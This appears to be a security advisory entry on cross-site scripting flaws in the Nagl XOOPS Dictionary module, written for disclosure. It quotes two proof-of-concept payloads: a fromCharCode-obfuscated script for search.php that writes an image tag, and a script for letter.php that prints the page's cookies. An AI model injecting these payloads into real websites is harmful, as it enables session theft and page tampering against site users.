|
Nagl XOOPS Dictionary Module Multiple Cross-Site Vulnerabilities
No exploit is required to leverage this issue. The following proof of concept has been provided: The following script passed to the 'search' field of the 'search.php' script will reportedly trigger this issue: script> function xss (){ var tag=String.fromCharCode(60)+String.fromCharCode(105)+ String.fromCharCode(109)+String.fromCharCode(103)+String.fromCharCode(32)+ String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+ String.fromCharCode(32)+String.fromCharCode(61); var web=String.fromCharCode(104)+String.fromCharCode(116)+ String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+ String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(119)+ String.fromCharCode(119)+String.fromCharCode(119)+String.fromCharCode(46)+ String.fromCharCode(103)+String.fromCharCode(111)+String.fromCharCode(111)+ String.fromCharCode(103)+String.fromCharCode(108)+String.fromCharCode(101)+ String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+ String.fromCharCode(109); var path=String.fromCharCode(47)+String.fromCharCode(105)+ String.fromCharCode(109)+String.fromCharCode(97)+String.fromCharCode(103)+ String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(47)+ String.fromCharCode(103)+String.fromCharCode(111)+String.fromCharCode(111)+ String.fromCharCode(103)+String.fromCharCode(108)+String.fromCharCode(101)+ String.fromCharCode(95)+String.fromCharCode(56)+String.fromCharCode(48)+ String.fromCharCode(119)+String.fromCharCode(104)+String.fromCharCode(116)+ String.fromCharCode(46)+String.fromCharCode(103)+String.fromCharCode(105)+ String.fromCharCode(102)+String.fromCharCode(62); document.write(tag+web+path); } xss() </script> The following proof of concept has been provided for the 'letter.php' script issue: ttp://attaker/modules/dictionary/letter.php?letter="><script>document.write(document.cookie)<script>( |
|
|
Privacy Statement |
